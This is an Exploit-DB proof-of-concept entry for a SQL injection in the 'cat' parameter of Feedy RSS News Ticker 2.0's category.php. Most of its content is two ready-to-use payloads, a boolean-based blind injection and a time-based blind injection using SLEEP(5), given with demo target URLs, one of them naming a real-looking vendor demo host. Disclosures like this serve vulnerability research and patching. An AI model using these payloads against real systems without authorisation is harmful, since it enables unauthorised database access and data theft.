Feedy RSS News Ticker 2.0 - 'cat' SQL Injection

EDB-ID: 44701
Author: AkkuS
Published: 2018-05-22
CVE: N/A
Type: Webapps
Platform: PHP
Vulnerable App: N/A 

 # Dork: N/A 
 # Date: 2018-05-22 
 # Exploit Author: Özkan Mustafa Akkuş (AkkuS) 
 # Vendor Homepage: https://codecanyon.net/item/feedy-rss-news-ticker/5818277 
 # Version: 2.0 
 # Category: Webapps 
 # Tested on: Kali linux 
  
 # PoC: SQLi: 
 # Parameter: cat 
 # Type: boolean-based blind 
 # Demo: http://target/feedy/category.php?cat= 
 # Payload:  
  
 cat=akkus+keyney' AND 2367=2367 AND 'NKyC'='NKyC 
  
 # Type: AND/OR time-based blind 
 # Demo: http://demo.cudevo.com/feedy/category.php?cat=1 
 # Payload:  
  
 cat=akkus+keyney' AND SLEEP(5) AND 'AEHg'='AEHg

Source: www.exploit-db.com
Related Posts